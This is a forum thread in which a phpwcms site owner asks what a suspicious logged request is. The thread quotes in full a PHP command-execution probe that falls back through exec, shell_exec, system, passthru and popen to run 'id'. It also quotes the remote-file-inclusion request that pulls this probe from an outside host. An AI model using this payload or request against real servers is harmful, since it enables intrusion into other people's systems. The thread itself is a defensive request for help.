Possible Attack Code?

[sustia]

Hi, often happen me to see in phpwcms_bad_behavior this kind of code:

Code: Select all

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Anyway, seems that nothing happens with my wcms's installation, but is an attack of what?
What type of damages can provoke?

Code: Select all

request_uri: /index.php?id=http://www.technic-marine-location.com/modules/icontent/include/wysiwyg/id.txt?

http_headers: GET /index.php?id=http://www.technic-marine-location.com/modules/icontent/include/wysiwyg/id.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: noria.ba.cnr.it
User-Agent: libwww-perl/5.807

[DeXXus]

YUP
http://www.google.com/search?q=echo%20"Mic22";

[sustia]

Hi DeXXus, which could be the consequences of this attack?

[DeXXus]

Hi DeXXus, which could be the consequences of this attack?

I really do not know. There isn't enough discussion to get a sense, really. Maybe mention it to your host and inquire whether they think you are at risk? Sorry to be of no real insight.

[sustia]

Hi, don't worry, thanks anyway.

[albu]

may be a little "off" the thread - but on my site it wasn't the code - I simply made a mistake when making CHMOD after upload to the server. I didn't control (..yes I know...) and all went well - until 7 days ago, when due to this error My site was hacked! AGAIN: Not PHPWCMS was the Problem - the man in front of the monitor was the problrem (some hours I was a mexican bank...phishing attack)